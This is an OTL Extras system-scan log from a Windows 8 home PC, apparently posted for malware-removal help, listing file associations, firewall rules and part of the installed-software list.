Rapport extras OTL OTL Extras logfile created on: 09.09 ... · Rapport extras OTL OTL Extras logfile created on: 09.09.2014 17:23:31 - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder

Rapport extras OTLOTL Extras logfile created on: 09.09.2014 17:23:31 - Run 1OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Muller\Downloads64bit- An unknown product (Version = 6.2.9200) - Type = NTWorkstationInternet Explorer (Version = 9.11.9600.17239)Locale: 0000100C | Country: Suisse | Language: FRS | Date Format: dd.MM.yyyy 7,88 Gb Total Physical Memory | 6,25 Gb Available Physical Memory | 79,26% Memory free9,13 Gb Paging File | 7,23 Gb Available in Paging File | 79,20% Paging File freePaging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)Drive C: | 912,70 Gb Total Space | 666,95 Gb Free Space | 73,07% Space Free | Partition Type: NTFS Computer Name: PC-MAISON | User Name: Muller | Logged in as Administrator.Boot Mode: Normal | Scan Mode: All users | Include 64bit ScansCompany Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Extra Registry (SafeList) ==========[/color] [color=#E56717]========== File Associations ==========[/color] [b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>].html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation).url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation) [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>].cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation).html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) [HKEY_USERS\S-1-5-21-3400277602-2072296053-2501058191-1001\SOFTWARE\Classes\<extension>].html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) [color=#E56717]========== Shell Spawning ==========[/color] [b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]batfile [open] -- "%1" %*cmdfile [open] -- "%1" %*comfile [open] -- "%1" %*exefile [open] -- "%1" %*helpfile [open] -- Reg Error: Key error.htmlfile [edit] -- Reg Error: Key error.htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)piffile [open] -- "%1" %*regfile [merge] -- Reg Error: Key error.scrfile [config] -- "%1"scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %lscrfile [open] -- "%1" /Stxtfile [edit] -- Reg Error: Key error.Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)Directory [Service photo Interdiscount] -- "C:\Program Files (x86)\Interdiscount\Service photo Interdiscount\Service photo Interdiscount.exe" "%1" ()Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)Folder [explore] -- Reg Error: Value error.Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation) [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]batfile [open] -- "%1" %*cmdfile [open] -- "%1" %*comfile [open] -- "%1" %*cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)exefile [open] -- "%1" %*helpfile [open] -- Reg Error: Key error.htmlfile [edit] -- Reg Error: Key error.htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)piffile [open] -- "%1" %*regfile [merge] -- Reg Error: Key error.scrfile [config] -- "%1"scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %lscrfile [open] -- "%1" /Stxtfile [edit] -- Reg Error: Key error.Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)

Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)Directory [Service photo Interdiscount] -- "C:\Program Files (x86)\Interdiscount\Service photo Interdiscount\Service photo Interdiscount.exe" "%1" ()Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)Folder [explore] -- Reg Error: Value error.Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error. [color=#E56717]========== Security Center Settings ==========[/color] [b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]"cval" = 1 [b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring] [b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]"VistaSp1" = AC 1C AE C5 46 9F CE 01 [binary data]"AntiVirusOverride" = 0"AntiSpywareOverride" = 0"FirewallOverride" = 0 [b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]"UpgradeTime" = [binary data] [b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]"DisableMonitoring" = 1 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]"UpgradeTime" = Reg Error: Unknown registry data type -- File not found [color=#E56717]========== Firewall Settings ==========[/color] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]"EnableFirewall" = 1"DisableNotifications" = 0 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]"EnableFirewall" = 1

"DisableNotifications" = 0 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]"EnableFirewall" = 1"DisableNotifications" = 0 [color=#E56717]========== Authorized Applications List ==========[/color] [color=#E56717]========== Vista Active Open Ports Exception List ==========[/color] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]"{9D3AA482-682B-465E-A243-7BBC6BFEC117}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) | "{B0FC81C2-6F74-4728-B149-9B629E93119E}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) | [color=#E56717]========== Vista Active Application Exception List ==========[/color] [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]"{02D834D4-AC87-4210-A29D-168144E1BEAD}" = dir=in | app=c:\program files (x86)\windowslive\messenger\msnmsgr.exe | "{04FE6347-99D3-4017-982E-4A5F0EFB3000}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer portal\ccd.exe | "{097B3C1B-A1DF-4C82-B134-40CA4F736E34}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\kernel\dms\clmsserverpdvd12.exe | "{0B2B81EA-55C0-4539-9630-6B5C3B9EA38A}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media\windowsupnpmv.exe | "{0B6117D7-E716-4823-A501-4714F220C75C}" = dir=out | name=@{microsoft.binghealthandfitness_3.0.2.315_x64__8wekyb3d8bbwe?ms-resource://microsoft.binghealthandfitness/resources/apptitle} | "{0F4B2D87-4D7C-43CA-B751-4940E4518B8B}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media\windowsupnpmv.exe | "{1010B8BC-872E-4099-AFC7-309FBFBBE660}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer photo\dmcdaemon.exe | "{11204FF9-977A-4383-A3DF-6FEE6E812E9F}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media_\windowsupnpmv.exe | "{121D90E9-FC4E-4013-9C48-F27EAB1A53E2}" = dir=out | name=zinio | "{12C8BC98-9FCE-4383-BFB4-9C8A8BB6A70C}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer photo_\dmcdaemon.exe | "{1FD715B4-E40D-45A7-8D25-114B33CDE37E}" = dir=in | name=hp all-in-one printer remote | "{27A15100-6F71-4EFA-87B8-61068A1B1A7F}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer photo_\dmcdaemon.exe | "{27B65C83-A7DA-4409-867C-85A2E5D24997}" = dir=in | name=zinio | "{2CFDA52C-770D-40F0-9E3E-02588D6DC937}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer portal\ccd.exe | "{301EBEB4-4EA6-4322-BF6F-D57C892BBADB}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media_\dmcdaemon.exe | "{307BD2A6-1EA4-4148-BD01-0528A8898871}" = dir=out | name=evernote touch |

"{30CDD99C-6DE8-4E3C-BCA1-26C0957A0573}" = dir=in | name=@{microsoft.windowscommunicationsapps_17.5.9600.20573_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} | "{324DE4A7-EF9A-48CB-A91A-F2DE3118C8CC}" = dir=out | name=booking.com partner edition | "{3315A55A-7B40-4BE8-AD72-D29A3902CBE1}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media\windowsupnpmv.exe | "{33A23EB2-A33B-49EA-8EB7-BCE65F563103}" = dir=in | name=acer explorer | "{3516FE2C-3A1E-41D3-8E86-695572C56211}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer portal\sdd.exe | "{372ABB78-4D00-4718-B707-7E74AB2B83DD}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer photo_\windowsupnp.exe | "{3941B95D-3341-40BA-8FA1-34B63251D7AD}" = dir=in | name=@{microsoft.xboxcompanion_1.4.2.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxcompanion/resources/33279} | "{3A72BBAA-39F0-481D-A253-1BF0D1551AD4}" = dir=out | name=@{microsoft.bingweather_3.0.2.309_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingweather/resources/brandedapptitle} | "{3B6D5396-2E93-4AF4-960B-83DA3C95A395}" = dir=out | name=doodle god free plus | "{3E455906-CCE4-452C-B4B6-116AD135C59B}" = dir=out | name=@{microsoft.bingfinance_3.0.2.258_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfinance/resources/brandedapptitle} | "{3E86FB97-7C57-4D52-B9F7-82A34D2BF301}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe | "{4282FE99-8560-4BC7-9576-5F3ED84E263F}" = dir=in | name=checkpoint.vpn | "{504C93F5-C330-40B4-A55C-51B7B102CCFC}" = protocol=17 | dir=in | app=c:\program files (x86)\nero\nero 12\nero backitup\backitup.exe | "{512F891A-78F0-413F-A8EE-8BCF5598843B}" = protocol=6 | dir=in | app=c:\program files (x86)\spotify\spotify.exe | "{52612920-E7E7-4457-8D27-59D4040445AB}" = dir=out | name=skitch touch | "{542367AA-0D7C-4C90-9026-565CB69E70B4}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer portal\ccd.exe | "{548DCF8C-BFF2-4BA4-AA88-FBAF9AC8BCC6}" = dir=in | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} | "{560448D6-095C-4907-B046-AC7F710701A7}" = dir=in | name=sonicwall.mobileconnect | "{571FA114-19AB-4CF8-B8AC-7CFAE044B4C8}" = protocol=17 | dir=in | app=c:\program files (x86)\spotify\data\spotifywebhelper.exe | "{5B555176-4395-41D5-BA0C-F6391CD93830}" = dir=in | name=newsxpresso | "{5BC3D533-7E21-4E6A-98D9-2D0AC970B9E8}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\kernel\dmr\powerdvd12dmrengine.exe | "{5C293472-0DFB-4C38-B55C-8EAABEB60E5C}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media_\dmcdaemon.exe | "{5DAD7CA2-6374-4984-8E23-E502978B2F7A}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer photo_\dmcdaemon.exe | "{5F4632C0-D5B1-40C3-B0D9-E3A759C81B9E}" = dir=out | name=sonicwall.mobileconnect | "{60124F67-CA2B-4419-82DF-0AE180850683}" = dir=out | name=@{microsoft.bingnews_3.0.2.309_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingnews/resources/brandedapptitle} | "{626BD253-CE72-48FE-A0B7-9844BB000CA9}" = dir=in | name=pinball fx2 | "{63C9CCB3-470E-4D37-91D1-E8E7B50F4886}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media\dmcdaemon.exe | "{6766AE3E-95B7-4D92-9AB0-7AD77A848F3A}" = dir=out |

name=@{microsoft.bingtravel_3.0.2.309_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingtravel/resources/brandedapptitle} | "{6952E4FE-CAE5-4889-9B1A-1CE0F80CBCFA}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer photo\windowsupnp.exe | "{69D52088-63D0-4DAB-9188-2601DB7AB039}" = dir=out | name=newsxpresso | "{6AA0F144-926C-4699-9324-E473066FAFCD}" = dir=out | name=@{microsoft.zunemusic_2.2.931.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/resources/ids_manifest_music_app_name} | "{6B035C14-46D5-47AA-9051-B900B875F1D1}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media_\dmcdaemon.exe | "{6B3D7E9A-3A52-4909-8FF7-77208FF2AEA0}" = dir=out | name=@{microsoft.bingfoodanddrink_3.0.2.313_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfoodanddrink/resources/apptitlewithbranding} | "{6E3244F4-83F9-42DA-958B-85502BE78853}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\movie\powerdvd.exe | "{6E381843-1AFB-4B1C-A2D3-F6F257207212}" = dir=out | name=@{browserchoice_6.2.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://browserchoice/resources/displayname} | "{6F7E214D-6434-40E0-A062-065513676373}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer photo_\windowsupnp.exe | "{705F581A-9441-411E-9D38-E069DB830549}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media_\windowsupnpmv.exe | "{77FE4FEF-8A04-42EF-B5FB-CC0322708B1E}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer photo_\windowsupnp.exe | "{78A971B9-B71F-4A16-8AEF-95672D4D9854}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer photo_\dmcdaemon.exe | "{7E7B01E7-692B-4D13-8AB7-24E365E4E478}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer photo\windowsupnp.exe | "{7FAD8C83-4773-4329-97DF-9BE7BBD8426C}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer photo_\windowsupnp.exe | "{8052A84D-F4BC-42AA-BE6D-764EC4CF3177}" = dir=in | name=@{magix.musicmakerjam_2.1.1027.0_x64__a2t3txkz9j1jw?ms-resource://magix.musicmakerjam/resources/app_name} | "{860DFE87-63A5-40DF-A431-6A0109C59AD6}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media\dmcdaemon.exe | "{86B32650-B59A-43BA-A32C-D2665BD7E608}" = dir=out | name=@{microsoft.windowscommunicationsapps_17.5.9600.20573_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} | "{8B950420-3A00-4FDF-9FF1-C9B6730FF370}" = dir=out | name=@{microsoft.windowsreadinglist_6.3.9654.20540_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} | "{8D42D0FD-BACF-4284-9CEA-132D835B9DA2}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\powerdvd12.exe | "{8E693F35-05C7-4054-BC7E-282610661412}" = protocol=6 | dir=in | app=c:\program files (x86)\nero\nero 12\nero backitup\backitup.exe | "{8F9F1AE7-06C6-4940-B4ED-85C88FAA74B0}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer photo\windowsupnp.exe | "{947FC97D-F5C9-4A36-BDEB-4F5CF47F1A6D}" = dir=out | name=tunein radio | "{9481838C-51EC-4988-B548-D49A99026C0C}" = protocol=17 | dir=in | app=c:\program files (x86)\spotify\spotify.exe | "{94AF6FB2-2039-4FB3-BDF3-A50D85CFA2A6}" = dir=out | name=hp all-in-one printer remote |

"{95EF99D5-214B-4194-B1F3-0C2790B7728D}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer portal\ccd.exe | "{96AA1C23-CF2C-4946-8C17-ED9102838447}" = dir=in | name=skype | "{988D1D93-307C-4FA7-812E-B9BDDE15491F}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media\dmcdaemon.exe | "{99F04F18-CA44-4A77-A9BF-5CB67557E69C}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer photo\dmcdaemon.exe | "{9ACB1FF3-DE1C-4AE9-9A65-7B0CCF4F1E5B}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer portal\virtualdrive.exe | "{9DD07B34-573C-43DF-AE68-C86750A4C5F8}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media\dmcdaemon.exe | "{9E3D57FC-7C37-4424-9352-4831E97D029D}" = dir=out | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} | "{A784BF1C-31C4-466E-9296-33A8D8E1D562}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media_\dmcdaemon.exe | "{AA2CEA72-CED0-47F9-A2E7-0ECA4C6A8AF9}" = dir=in | name=@{microsoft.windowsreadinglist_6.3.9654.20540_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} | "{ACF14C09-855D-4EE2-A3ED-7CAB09D8E51F}" = dir=out | name=kindle | "{B4047EF2-D7EF-41C7-9FE0-BE7D1E9B966D}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media\windowsupnpmv.exe | "{B6C3BB28-3661-425A-B751-7006BC35055D}" = protocol=6 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe | "{BA1A987F-EDCA-4F0F-BECA-2BA9A2B25311}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer portal\ccd.exe | "{BCD1F970-0D02-4A66-A4FD-582B58680F12}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media_\windowsupnpmv.exe | "{BDB0610B-EEE9-4F17-93CB-89FCC8D13606}" = dir=out | name=@{microsoft.bingmaps_2.1.2922.2139_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingmaps/resources/appdisplayname} | "{C2748DFA-FEE2-4330-9F6D-43BB6ABFD1F5}" = protocol=6 | dir=in | app=c:\program files (x86)\spotify\data\spotifywebhelper.exe | "{C44D649D-6B61-4659-B306-2F74A96C979B}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\powerdvd12agent.exe | "{C5DEE4AB-2120-4082-8775-5EBF3F3268EB}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer portal\ccd.exe | "{C75472B5-13E3-4E2B-9B84-4BF8D7FA7BE7}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer photo\dmcdaemon.exe | "{C8676194-34D4-4338-853D-5324FF561F88}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media\windowsupnpmv.exe | "{CACB1234-85FC-40F4-850A-54661FB3579E}" = dir=out | name=pinball fx2 | "{CB2B9F50-F242-4D52-9BC1-AD9D53751E05}" = dir=out | name=7digital music store | "{CBDC00C5-7549-43FE-B9B4-04BF06163A32}" = dir=out | name=@{microsoft.bingsports_3.0.2.317_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingsports/resources/brandedapptitle} | "{CC586365-3AA2-4DC0-A747-BFEFADC55F34}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer media\dmcdaemon.exe | "{CC9FD19D-7587-4D45-952A-6F1147E136E6}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media\dmcdaemon.exe | "{CE0F5B2F-743E-460E-A8A0-06EAF866831C}" = dir=out | name=- games app - | "{CF053380-8D7B-4114-AF84-3E984A31F357}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer photo\dmcdaemon.exe |

"{CF20ECB3-75AE-43AB-8D11-AFBD0A7C16F2}" = protocol=17 | dir=in | app=c:\program files(x86)\acer\acer photo\windowsupnp.exe | "{D131DE67-31AC-47FA-A7E6-F1E0832B333F}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer photo\windowsupnp.exe | "{D23AF6AA-DBA8-4ACD-AC19-EB1D007A22EC}" = dir=out | name=ebay | "{D635A356-6DAC-46F2-A590-7A6642CDEB81}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media_\windowsupnpmv.exe | "{D6822327-6985-4A37-AAFF-22B1669F4692}" = dir=in | app=c:\users\muller\appdata\local\microsoft\skydrive\skydrive.exe | "{D6980480-941A-4DF6-AB81-3734ECD3D779}" = dir=out | name=junipernetworks.junospulsevpn | "{D6DE4979-07F0-4969-B09D-E2A4956E27C4}" = dir=out | name=skype | "{D74C5918-2D79-45A2-AA96-2F6D76A9A004}" = protocol=17 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe | "{D7F6AEB1-33E9-44D6-98A2-1FA9B03A751E}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer media\windowsupnpmv.exe | "{DB59588E-ED90-4C47-A7B5-7929DD0C0BD2}" = dir=out | name=checkpoint.vpn | "{DBC3CB27-F251-4CA6-AC24-54499F83B454}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer photo\dmcdaemon.exe | "{DD74970B-1A1E-454A-B41A-B01C60099EF5}" = dir=out | name=windows_ie_ac_001 | "{DF4E2C37-16E0-4464-8857-50872C3064C9}" = dir=in | app=c:\program files (x86)\cyberlink\powerdvd12\powerdvd12ml.exe | "{DF4FD13B-BEE9-4DA8-AC6E-7BA2AE2EDF66}" = protocol=6 | dir=in | app=c:\program files(x86)\acer\acer photo\windowsupnp.exe | "{DFC8AAD6-71B4-47F7-9A09-0A3F31CC991F}" = dir=out | name=shark dash | "{E28D75E5-327F-4ECE-958D-6AB6E27A5DB6}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer photo\dmcdaemon.exe | "{EC799E33-72BA-42D7-9127-DEFE68F9799D}" = dir=in | name=junipernetworks.junospulsevpn | "{ED75AFC6-F4E1-467F-B153-EEA5DBCAE9D7}" = dir=out | name=accuweather for windows 8 | "{EE994E59-88B1-4C2E-89CD-544B67BC8A5B}" = protocol=6 | dir=in | app=c:\program files (x86)\acer\acer portal\sdd.exe | "{F051DC26-094B-41C2-8CC8-D73298936615}" = dir=out | name=@{microsoft.xboxcompanion_1.4.2.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxcompanion/resources/33279} | "{F122582B-484A-4454-B3C9-EFA685ABB21B}" = protocol=17 | dir=in | app=c:\program files (x86)\acer\acer portal\virtualdrive.exe | "{F3FE764D-7F68-4FC0-AD1C-60C3CCEB85F4}" = dir=in | name=@{browserchoice_6.2.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://browserchoice/resources/displayname} | "{F4A7FF2D-E556-4078-8B31-7A0179B83CCD}" = dir=out | name=@{microsoft.xboxlivegames_2.0.139.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxlivegames/resources/34150} | "{F57D1AD2-2AD9-47FC-A40B-27B5D92856F1}" = dir=out | name=acer explorer | "{F62AD15A-949B-4300-B6B3-BC9CEDF286CD}" = dir=out | name=@{magix.musicmakerjam_2.1.1027.0_x64__a2t3txkz9j1jw?ms-resource://magix.musicmakerjam/resources/app_name} | "{F64300AD-D559-4000-BD45-0997BCC8E70A}" = dir=out | name=f5.vpn.client | "{F77E5446-4378-4E99-8B7A-7061AAAEA193}" = dir=in | name=f5.vpn.client | "{F8BC26C2-A83A-473F-924B-15E49871433E}" = dir=out | name=wordament | "{FA878511-274E-4ED0-8C67-B52866E47963}" = dir=in | name=evernote touch |

"{FEDD20C9-D9B6-4B51-AD05-6C16D361A0F9}" = dir=out | name=@{microsoft.zunevideo_2.6.256.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunevideo/resources/ids_manifest_video_app_name} | [color=#E56717]========== HKEY_LOCAL_MACHINE Uninstall List ==========[/color] 64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]"{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}" = Acer Recovery Management"{13885028-098C-4799-9B71-27DAC96502D5}" = Acer Remote Files"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219"{409CB30E-E457-4008-9B1A-ED1B9EA21140}" = Intel(R) Rapid Storage Technology"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17"{89AFB053-A343-46EF-97E4-D593AD7184E6}" = Intel® Trusted Connect Service Client"{91F52DE4-B789-42B0-9311-A349F10E5479}" = Acer Power Management"{93F692D4-0C4D-4EED-9BFE-657C1D5959FE}" = Intel(R) Rapid Storage Technology"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting"{A84A4FB1-D703-48DB-89E0-68B6499D2801}" = Qualcomm Atheros Bluetooth Suite (64)"{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}" = Acer Launch Manager"{C1FA525F-D701-4B31-9D32-504FC0CF0B98}" = Acer Quick Access"{C6E57DC0-5699-47D4-9263-CEE00A4BB1FC}" = Windows Live MIME IFilter"{E9FA781F-3E80-4399-825A-AD3E11C28C77}" = MSVCRT110_amd64"Elantech" = ETDWare PS/2-X64 11.6.28.201_WHQL [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]"{046AEE60-B016-42FE-96DF-7EAD4F872C2D}" = Windows Live"{0B311221-05A5-4766-8D03-7A6446794156}" = Nero RescueAgent Help (CHM)"{0E4630AF-0AB7-440E-A978-1A78FC4F43B9}" = Nero Launcher"{16E46BCF-3D36-4353-9BCB-344F7812CEDE}" = Photo Gallery"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable -x86 9.0.30729.4148"{1F9E8447-9B82-45D5-A6D7-2A4CB874111F}" = Windows Live Mail"{24758B1D-9345-4538-A69A-05660F63A296}" = Junk Mail filter update"{26A24AE4-039D-4CA4-87B4-2F03217067FF}" = Java 7 Update 67"{28006915-2739-4EBE-B5E8-49B25D32EB33}" = Qualcomm Atheros WLAN and Bluetooth Client Installation Program"{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App" = Update Installer for WildTangent Games App"{31F23B8C-2B9D-42E9-9E45-8E9E4BCA6B70}" = Windows Live Mail"{37476589-E48E-439E-A706-56189E2ED4C4}_is1" = UltraCoupon"{388E4B09-3E71-4649-8921-F44A3A2954A7}" = Microsoft Visual Studio 2005 Tools for Office Runtime"{3AAB08A3-F129-4BD5-B409-AE674F93759D}" = Prerequisite installer"{3D9CB654-99AD-4301-89C6-0D12A790767C}" = Identity Card"{4260CAAE-D108-4223-A1C5-96B67062FE86}" = Windows Live Installer"{43711B8E-AE78-4C83-84EC-3E86D689311C}" = Galerie 